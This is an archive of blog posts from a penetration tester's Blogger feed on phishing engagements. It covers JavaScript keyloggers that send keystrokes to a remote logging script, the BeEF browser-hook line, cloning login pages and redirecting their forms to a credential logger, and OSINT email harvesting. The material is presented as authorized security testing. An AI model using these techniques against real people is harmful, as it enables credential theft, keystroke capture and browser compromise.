Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-78712662239404467572015-04-09T11:41:00.000-04:002020-11-17T12:47:02.331-05:00New Script/Tool: KeyLogging in JavaScript<div dir="ltr" style="text-align: left;" trbidi="on">So, you want to set up a keylogger within a website. Ultimately it is fairly simple. there are 2 items you will need. First will be a way to log the keystrokes and second would be a way to capture the keystrokes.<br /><br />For the logging of the key strokes, the simplest way would be with a small script similar to the following one. This script accepts any GET or POST parameter and then logs it to the specified file. Of course with this, it is assumed that you have a place to host this script and that the script has the proper permissions to create and write to the file.<br /><br /><script src="https://gist.github.com/tatanus/6e7fc6aaeca06d046dc1.js"></script><br />It should be noted that I have used a version of that logging script for numerous situations, mostly for social engineering. It works well for credential harvesting websites. It also is useful as a simple data exfiltration script.<br /><br />With that taken care of, now we need to build a way to capture the key strokes. One of the simplest ways to go about this is demonstrated in the following code sample. This code when included within a webpage (with the proper surrounding "script" tags) will capture every key pressed (as long as it is a printable character) and then send it off to a secondary logging script.<br /><br /><script src="https://gist.github.com/tatanus/1ed7cf669f03643a80ad.js"></script><br />The previous simple key capture script has a few limitations. The primary one is that it only captures printable characters. Thus, key presses like [Backspace], [tab], [enter], [arrow keys], and so on will not be captured. To account for these missing keys, it is important to not only listen for "onkeypress" but also for "onkeydown". The following code takes this into account to provide a much more complete key capturing script.<br /><br /><script src="https://gist.github.com/tatanus/1d58b261099b927ad3b0.js"></script><br />Hopefully, you will find these scripts of use. As always, if you have any questions/comments/criticisms, please feel free to let me know.</div><span><a name='more'></a></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-84546160900508107722015-04-06T11:13:00.000-04:002020-11-17T12:47:32.769-05:00New Script/Tool: BeEF Restful API in python<div dir="ltr" style="text-align: left;" trbidi="on">The BeEF (Browser Exploitation Framework) Project is a penetration tool that is focused on attacking and exploiting web browsers. You can find out more information about the BeEF project at their <a href="http://beefproject.com/">website</a> as well as on their <a href="https://github.com/beefproject/beef">GitHub</a> page.<br /><br />How about a little more information on the tool? (not all inclusive, just some high points)<br /><ul style="text-align: left;"><li>BeEF is written in Ruby.</li><li>It is bundled as part of the <a href="https://www.kali.org/">Kali</a> Linux Penetration Testing Distro by default.</li><li>It has a large number of modules which can help in pulling information from, attacking, and exploiting a wide number of web browsers.</li><li>If properly configured, an attacker can launch Metasploit payloads directly from within BeEF.</li><li>BeEF has a RESTFUL API.</li><li>In order to make use of BeEF, an attacker only needs to start up BeEF and add 1 simple line of HTML to the target website.</li></ul><br />It is these two items which makes it of particular interest during a phishing exercise/engagement. The fact that all an attacker needs to do is add one HTML line (see below) to a website to make it work with BeEF is amazing.<br /><blockquote class="tr_bq"><i><b><script type=text/javascript src=http://127.0.0.1:3000/hook.js></script></b></i></blockquote>Combine this with the ability to control, monitor, and pull data from BeEF using its RESTFUL API, and you have a very powerful tool for automating various aspects of a phishing exercise/engagement.<br /><br />Unfortunately I could not find an implementation of the BeEF RESTFUL API for python that I was happy with. That is why I wrote my own BeEF RESTFUL API python module. It can be found on GitHub at <a href="https://github.com/tatanus/beefapi">https://github.com/tatanus/beefapi</a> It does not incorporate all of the possible functions that the BeEF RESTFUL API allows for, but it does incorporate all of the ones I found useful.<br /><br />Please take a look and use it if you find it useful. If you have comments/criticisms/etc with the code, please feel free to let me know.</div><span><a name='more'></a></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-61972269511721969462015-04-03T13:34:00.000-04:002020-11-17T12:47:43.661-05:00New Script/Tool: clonesite.py<div dir="ltr" style="text-align: left;" trbidi="on"><br />As mentioned in an earlier <a href="http://blog.seedsofepiphany.com/2015/04/phishing-101-cloning-site.html">post</a>, I decided to write my own site cloner tool for use in my phishing exercise/engagements. I needed a tool that would complete (or as close as I could get) clone any given site and then update any forms with links to a data collection script that I specify.<br /><br />The current version of the "Site Cloner" tool is hosted on GitHub at <a href="https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/clonesite.py">https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/clonesite.py</a><br /><br />In order to run the script, simply execute:<br /><blockquote class="tr_bq">python clonesite.py <URL> <outdirectory> (optional <form action>)<br />where:<br /> <URL> = the full URL of the page to be cloned<br /> <outdirectory> = where do you want the files to be saved to<br /> <form action> = the script to execute when someone submits a form</blockquote>An example would be:<br /><blockquote class="tr_bq">python clonesite.py "http://www.safelogin.co" "safelogin" log.php </blockquote>This command line would execute "clonesite.py" on the URL "http://www.safelogin.co", save all files into the directory located at "./safelogin" and finally rewrite all forms to submit to a script called "log.php". Someone will have to create that script (log.php) later and stored in the same directory.<br /><br />When the script is run, you will see verbose output similar to the following:<br /><br /><script src="https://gist.github.com/tatanus/ef80ec3f5b369e4a92a8.js"></script> In this output you can see each page, link, file, and form that the script identifies and what it does with it. Some files (binary formats such as images) are simply downloaded, where as html documents will be processed for additional links and forms. Anytime a form is encountered, the "form tag" is rewritten.<br /><blockquote class="tr_bq"><span style="font-size: x-small;">FOUND A FORM [<form class="form-horizontal" action="/create.php" method="GET">]<br />REWROTE FORM TO BE [<form method="get" action="log.php" class="form-horizontal">]</span></blockquote><div>As is shown in the above example, the form action was changed from being "/create.php" to being "log.php". By doing this automatically, it saves time and effort by not requiring the user to go back, find, and edit all of the forms them selves.</div><br />Below is an example of what "log.php" could look like:<br /><br /><script src="https://gist.github.com/tatanus/6e7fc6aaeca06d046dc1.js"></script> I hope this script is of use to you. As always, if you have any comments/criticisms,etc, please leave a comment below.</div><span><a name='more'></a></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-35178176023918572562015-04-02T16:05:00.000-04:002020-11-17T12:47:53.701-05:00Phishing 101: Cloning a Site<div dir="ltr" style="text-align: left;" trbidi="on">Many phishing exercises/engagements require both the sending of a malicious email as well as the presence of a malicious website/web server. This is definitely the case where the goal is to collect credentials or to exploit the user's web browser.<br /><br />Before we get into crafting and sending emails, we need to make a malicious website. There are a few ways to go about this.<br /><br /><h2 style="text-align: left;">Browser Exploitation</h2>First you could create a dummy site that just has some malicious code in it and the site does not really need to display anything to the user. This is common with browser attacks. One example of this is when using the BeEF (Browser Exploitation Framework) project.<br /><br />The BeEF Project is a penetration tool that is focused on attacking and exploiting web browsers. You can find out more information about the BeEF project at their <a href="http://beefproject.com/">website</a> as well as on their <a href="https://github.com/beefproject/beef">GitHub</a> page.<br /><br />If you take this approach, BeEF makes it very easy in that once you have BeEF running, you can create a web page that contains a line similar to:<br /><blockquote class="tr_bq"><b><i><script type=text/javascript src=http://127.0.0.1:3000/hook.js></script></i></b></blockquote>You would want to replace the "127.0.0.1" with the IP of the Internet facing system that BeEF is running on. Then send an email to the target instructing them to visit the web site that you inserted that line into and then you should have a successfully compromised web browser, once the target visits the malicious website.<br /><br /><h2 style="text-align: left;">Information/Credential Harvesting</h2>Now for the second type of malicious website. This type is a web site that looks as close to 100% valid as possible and will likely be used to capture credentials or other important information such as username, password, RSA token, etc...<br /><br />To make such a site, you can:<br /><ul style="text-align: left;"><li>use "wget" to clone an existing site, then edit it</li><li>make it entirely by hand</li><li>use a tool that is designed for site cloning to dedicated tool and then edit the results</li></ul><br />If you wish to use "wget" to clone a site, the following options will come in handy.<br /><ul><li>perform full clone:</li><ul><li>wget -m -p -k <URL></li><ul><li>-m = Mirroring : This option turns on recursion and time-stamping, sets infinite recursion depth.</li><li>-p = Page Requisites : This option causes wget to download all the files that are necessary to properly display a given HTML page.</li><li>-k = After the download is complete, convert the links in the document to make them suitable for local viewing.</li></ul></ul><li>only clone X levels deep:</li><ul><li>wget -r -l 1 -p -k </li><ul><li>-r = Enable recursion</li><li>-l X = Limit recursion to X levels deep</li><li>-p = Page Requisites : This option downloads all the files that are necessary to properly display a given HTML page.</li><li>-k = After the download is complete, convert the links in the document to make them suitable for local viewing.</li></ul></ul></ul><br />You may ask why you would not always want to just do a full clone. Well, if you are just wanting to capture the values entered into a particular form, you will only need to clone that page and you would not need the rest of the site.<br /><br />Now that you have cloned the site (or as much of it as you need to), you will need to edit the html and make any necessary changes to the forms that you need in order to capture the credentials. This is also the time where you would make any other edits you desire. When editing forms, it is useful to have a secondary script handy that can be used as the "action" for the form. The code sample below is a simple php script that will log all GET and POST parameters passed to it.<br /><br /><script src="https://gist.github.com/tatanus/6e7fc6aaeca06d046dc1.js"></script> When creating a web site by hand, you can get a bit of a head start by opening the page you want to clone and then "view source", select it all and copy paste it into a new html document. Then as before, you will need to make any necessary changes to the html that are needed.<br /><br />There are a few tools available to help such as <a href="https://www.httrack.com/">HTTrack</a>. According to the website,<br /><blockquote class="tr_bq"><i>[HTTrack] allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.</i></blockquote>Again as before, you will need to make any necessary changes to the html that are needed.<br /><br />Finally, I would like to mention a script I wrote that can be used to help with cloning a site and automatically making any necessary edits to the contained forms. The script can be found at <a href="https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/clonesite.py">https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/clonesite.py</a> I will be releasing a new blog post describing the details of this script in the next few days.<br /><br /></div><span><a name='more'></a></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-12732449981214296912015-04-01T09:09:00.000-04:002020-11-17T12:48:00.796-05:00New Script/Tool: Email Address Finder<div dir="ltr" style="text-align: left;" trbidi="on"><br />While performing various phishing exercises/engagements, I found myself having to identify list of potential email addresses on a regular basis. Tools like "theHarvester" make this task easier, however, theHarvester does not just find email addresses. It also finds associated host names and while it does search a large number of search engines, it did not search all of the ones I thought it should.<br /><br />As a result, I ended up writing my own minimal script to search for email addresses across all of the search engines I could think of at the time. The tool currently searches for email address from 8 different search engine sources:<br /><br /><ul style="text-align: left;"><li>google</li><li>bing</li><li>ask</li><li>dogpile</li><li>yandex</li><li>baidu</li><li>yahoo</li><li>duckduckgo</li></ul>simply run:<br /><blockquote class="tr_bq" style="text-align: left;"><b>python find_emails.py <target domain></b></blockquote>and it will start querying each of the above listed search engines for records that match<br /><blockquote class="tr_bq"><b>@<target domain></b></blockquote>and then parse the resulting output for strings that match the email regex of<br /><blockquote class="tr_bq"><b>[a-zA-Z0-9\.\-_]+@[a-zA-Z0-9\.\-]*</b> + <b><target domain></b></blockquote>Once the regex has been applied, all of the identified email address are added to a list, and uniqued to produce the final list of identified potential email addresses.<br /><br />I fully admit that this code is not new or unique, but I wrote it to suit my needs and if you find it useful as well, then please let me know. If you have suggested improvements, find errors, etc, please let me know as well.<br /><br />You can find this code located at: <a href="https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/find_emails.py">https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/find_emails.py</a></div><span><a name='more'></a></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-64012530763791273712015-03-31T16:38:00.000-04:002020-11-17T12:48:07.297-05:00Phishing 101: Target Identification / OSINT<div dir="ltr" style="text-align: left;" trbidi="on">When a new Phishing exercise/engagement is began, among the first items that will need to be collected is a list of target email addresses. This is typically handled in one of two ways (or in some cases, a combination of them).<br /><br /><ol style="text-align: left;"><li>The customer provides a list of email address that is to be targeted. All phishing emails MUST be sent to one of the email address in the list.</li><li>The attacker (you) must do your own research to identify potential email targets.</li></ol><br />As the first way (customer provides the target list) is a bit boring to discuss here, we will be focusing on the second; finding your own targets. This type of internet recon is typically referred to as OSINT (<b>O</b>pen <b>S</b>ource <b>Int</b>elligence). As I covered a bit of OSINT in a <a href="http://blog.seedsofepiphany.com/2013/10/internet-footprinting-aka-osint-open.html">previous post</a>, I will review it here and add additional information as needed.<br /><br />In your attempts to identify potential email targets for the phishing exercise/engagement, you will find that there are many resources (websites and tools) that can aid you in your research/intelligence gathering. Some of the common website I find useful for identifying email addresses are:<br /><ul style="text-align: left;"><li>Web Search Engines (examples include:)</li><ul><li><a href="https://www.google.com/">Google</a></li><li><a href="https://www.bing.com/">Bing</a></li></ul><li>Social Media (examples include:)</li><ul><li><a href="https://twitter.com/">Twitter</a></li><li><a href="https://www.facebook.com/">Facebook</a></li><li><a href="https://www.linkedin.com/">Linkedin</a></li></ul></ul>Google, Bing, and other search engines can be a great asset in identifying email addresses. Simply by searching for <b><i>"@<targetdomain.com>"</i></b> you should get a list of links that each contain an email address in the displayed description. Then by simply copy-n-pasting the email addresses into a targets file, you can start building your list. Please not that tools like "theHarvester" mentioned later can do this for you.<br /><br />Social media sites are ripe with useful information. Most of them have a way to search for people who say they work for a particular company. Thus, by searching for "employees of <target company>" you should be presented with a list of potential employees. Unfortunately, most social media sites do not display the email addresses. However, they do usually display their first and last names. Now, if you have been able to identify a few (or at least 1) valid email address, you should know the email address format. Common email formats are: (fn=first name, fi=first initial, ln=lastname)<br /><br /><ul style="text-align: left;"><li>[fi][ln]@company.com</li><li>[fn].[ln]@company.com</li><li>[fn]_[ln]@company.com</li></ul><br />By using this knowledge, and the list of first and last names you collected, you should be able to convert them into likely email addresses. Again, it should be noted that the tool Recon-NG has the ability to semi-automate this process of searching social media sites, identifying reported employees, and mangling their names into potential email addresses.<br /><br />Additionally, some of the common tools I typically employ in OSINT are:<br /><ul style="text-align: left;"><li>whois</li><li><a href="https://github.com/laramies/theHarvester">theHarvester</a></li><li><a href="https://bitbucket.org/LaNMaSteR53/recon-ng">Recon-NG</a></li><li><a href="https://www.elevenpaths.com/labstools/foca/index.html">Foca</a></li><li><a href="https://www.paterva.com/web6/products/maltego.php">Maltego</a></li></ul>"whois" is just a command line tool that allows you to look up information on a particular domain name. Many times, this information will contain a few email addresses, names, and phone numbers. All of which can be useful during the phishing exercise/engagement.<br /><br />As mentioned before, "theHarvester" is a command line Linux tool that can perform various searches against common search engines, to identify email addresses and host names associated with a target domain name.<br /><br />Again, as mentioned earlier, "Recon-NG" is a command line Linux tool, that can perform various searching using a multitude of online tools to identify potential employees of a company, identify potentially leaked passwords, generate potential target email address lists, and many other bits of useful information.<br /><br />"Foca" is a windows binary that can search a given target website for any available documents (office docs, pdfs, etc) and then extracts the "metadata" from the documents to identify interesting information such as:<br /><br /><ul style="text-align: left;"><li>usernames</li><li>machine names</li><li>installed software</li></ul>It should be noted that Foca is a commercial product, but does have a limited/free version available.<br /><br />"Maltego" is sort of a "catch all" tool for OSINT. Maltego can perform numerous "transforms" on entered and gathered data to identify associated data from numerous online sources. For example, given a company name, it can identify potential email addresses. From those email addresses, it can attempt to idenify the associate People (first name and last name) as well as any online accounts that have the associated email address. And so on. It should be noted that Maltego is a commercial product, but does have a limited/free version available.<br /><br />By no means, is the lists above provided as all inclusive. These are just some of the tools I find myself using on a regular basis. new tools are being developed all of the time as well as improvements being made to the older tools.<br /><br />In future blog posts, I may go into more detailed reviews of some of the mentioned tools, but for now, just know they exist and go, download them, and try them out.<br /><br />As always, all comments/questions/criticisms are welcomed.</div><span><a name='more'></a></span>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-5789294398760146186.post-13804811356574641012015-03-27T14:45:00.000-04:002020-11-17T12:48:14.932-05:00Phishing 101: An Intro<div dir="ltr" style="text-align: left;" trbidi="on">If you search on the internet or attend pretty much any security conference, you will find a plethora of information on what "phishing" is and how to perform it. As such, this post (and the following ones in the series) will just cover the high points and provide useful references on where you can find more in-depth information.<br /><br />At its core, phishing is the sending of an email to a target with the intent of having the target perform some action which will lead to the attacker gaining some new piece of information or access.<br /><br />The statement is a bit vague, and it is meant to be so. That is because phishing can take many forms with many different desired outcomes. The typical outcomes are:<br /><ul style="text-align: left;"><li>harvesting credentials from a target, typically via a credential harvesting website</li><li>compromise of the target's web browser via a drive by browser attack or a malicious java payload</li><li>compromise of a target's system typically via a malicious attachment</li></ul>For the purposes of this blog post and the following ones, we will be discussing phishing primarily from the perspective of a contractually/legally authorized phishing exercise/engagement.<br /><br />For most phishing exercises/engagements, the following 4 steps will occur:<br /><ol style="text-align: left;"><li>Target identification via</li><ol><li>the customer providing the target list</li><li>the attacker performing Open Source Intelligence Gathering (<a href="http://blog.seedsofepiphany.com/2013/10/internet-footprinting-aka-osint-open.html">OSINT</a>)</li></ol><li>One or more websites are designed and made active.</li><ol><li>Two possible site types are:</li><ol><li>credential harvesting</li><li>browser exploit</li></ol></ol><li>The attacker will craft and then send the phishing emails to the target email addresses.</li><ol><li>These emails could be nothing more than a simple template containing a url to one of the previously designed websites, or it could contain a malicious attachment.</li></ol><li>As the exercise/engagement progresses, the attacker will monitor the results and use them to ultimately create a report for the customer.</li></ol>Each of these steps will be discussed in more detail in future blog posts.</div><span><a name='more'></a></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-14622598491819423742014-09-12T14:46:00.000-04:002020-11-17T12:48:22.010-05:00All security tools need a “–demo” option<div dir="ltr" style="text-align: left;" trbidi="on"><div style="margin-bottom: 1.5em;"><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">Over the past few years I have seen movies actually trying to include actual computer hacking, granted most of it is just showing some output from NMap.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">That got me thinking. Would Hollywood be more likely to include more (and different) “hacking” tools in their movies if they all had a “–demo” flag/option?</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span><a name='more'></a></span><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">The concept is that if you run the tool and provide the “–demo” flag, it will start generating either canned output or start randomly generating output which looks like real output without actually doing anything. This way, the actors/writers/etc… do not actually have to know what they are doing or even learn how to use the tools. All the have to do is run the tool and give the “–demo” flag and they ave “real” hacker-stuff showing up on their screen. :)</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">What do you think? Good idea or crap?</span></span><br /><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;"><br /></div></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-34732290108298272562013-10-12T14:48:00.000-04:002020-11-17T12:48:29.284-05:00Internet Footprinting (aka OSINT – Open Source Intelligence)<div dir="ltr" style="text-align: left;" trbidi="on"><div style="margin-bottom: 1.5em;"><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">What is OSINT? Well, according to Wikipedia it is:</span></span><br /><blockquote class="tr_bq"><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">“Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC), the term “open” refers to overt, publicly available sources (as opposed to covert or clandestine sources); it is not related to open-source software or public intelligence.”</span></span></blockquote><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">In general, OSINT is simply the identifying, collecting, and analysis of publicly available data about a person, place, or thing.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span><a name='more'></a></span><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">OSINT is NOT merely used for cyber stalking or DOXing. (DOXing is the act of gathering personal information about people on the Internet, often including real name, known aliases, address, phone number, SSN, credit card number, etc. typically for the sole purpose of causing embarrassment, mischief, and/or harm to the targeted person.)</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">OSINT has many valid/beneficial uses. These include (but are not limited to):</span></span><br /><br /><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">identifying information about yourself (or your own company) that may be available on the internet</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">part of a network penetration (or social engineering) exercise</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">perform additional/extended background check on potential corporate partners or employees</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">identifying possible information leakage from your company</span></li></ul><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">There a few typical types of OSINT, each with their own PROs/CONs:</span></span><br /><br /><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Purely Passive</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">PRO - no traffic directed toward the target (i.e. no evidence in server logs)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">CON - only relying on second hand data at best</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Examples</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">search engine cached pages</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">archive.org saved pages</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">searching across pastebin (and similar sites)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">searching social media sites</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">browsing Shodan for ports, systems, and service banners</span></li></ul></ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Typical Internet Traffic</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">PRO – gaining data directly from target’s websites and systems</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">CON - traffic is being sent directly toward the target thus showing up in server/system logs</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Examples</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">DNS queries</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Visiting web pages owned by the target</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">downloading documents from websites</span></li></ul></ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Checking Locks and Doors</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">PRO - possibly gaining amazing amounts of data about types of system, websites on odd ports, and other services such as ftp, vnc, etc…</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">CON - lots of traffic sent to target and chance of eing detected is considerably higher</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Examples</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">perform DNS brute forcing</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">perform ip scans across the target’s ip space to identify active systems</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">perform port scanning to identify open ports and gather banners</span></li></ul></ul></ul><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">There are numerous commercial/free tools/websites that can be used to perform or assist in OSINT gathering. In future posts, I will be covering many of these tools and websites and discussing how they can be used to perform OSINT.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">What are a few sources of data of OSINT: (more will be discussed in future posts)</span></span><br /><br /><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Pastebin (an similar sites)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">DNS (zone transfers, txt, hinfo, etc… records)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Websites (email addresses, org charts, documents, addresses, phone numbers, etc…)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Search engines (google, bing, etc…)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Social networks (linkedin, twitter, facebook, etc…)</span></li></ul></div><ul style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px; list-style: square; margin: 0px 0px 1.5em 3em;"></ul></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-44732055455996199802013-09-12T14:45:00.000-04:002020-11-17T12:48:38.489-05:00Building a New Pentest Lab<div dir="ltr" style="text-align: left;" trbidi="on"><div style="margin-bottom: 1.5em;"><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">A while back I decided that I was going to start a personal infosec “re-education” process during which I hope to learn new tools/techniques, polish up on the abilities I already have, and enhance any areas where I may be lacking. In order to facilitate this, I needed a work area. As with any project (woodworking, automotive, or information security), having the proper work area can make a huge difference in one’s ability to succeed in their endeavors.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span><a name='more'></a></span><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">For my information security “re-education” project, one key part of my “work area” needed to be a wide variety or operating systems to target/test against. There are a few different approaches I could have taken to achieve this:</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><b>1) Use what is available.</b></span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">Look around your house/office. You probably have a few older Windows/Unix systems which you do not use on a regular basis. Odds are you also have a personal printer and/or other network attached devices. All of those make excellent targets.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><b>2) Use what you can borrow.</b></span></span><br /><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Much like the previous option, but in this one, you should ask around with friends/family/etc… to see if anyone has any old/unused hardware/system which they can loan/give you. If lucky, you can obtain some good (possibly rare) equipment this way.</span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><b>3) Use a simple virtualization approach.</b></span></span><br /><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Since you probably do not have access to lots of unused desktops/laptops/etc.. on which to install your desired target operating systems, you should look into virtualization. There are several good virtualization solutions available to use (and in most cases, the software itself is free).</span><br /><br /><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">VMWare PLayer</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">QEMU</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">VirtualBox</span></li></ul><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">Any of these solutions can be easily setup/installed on a personal 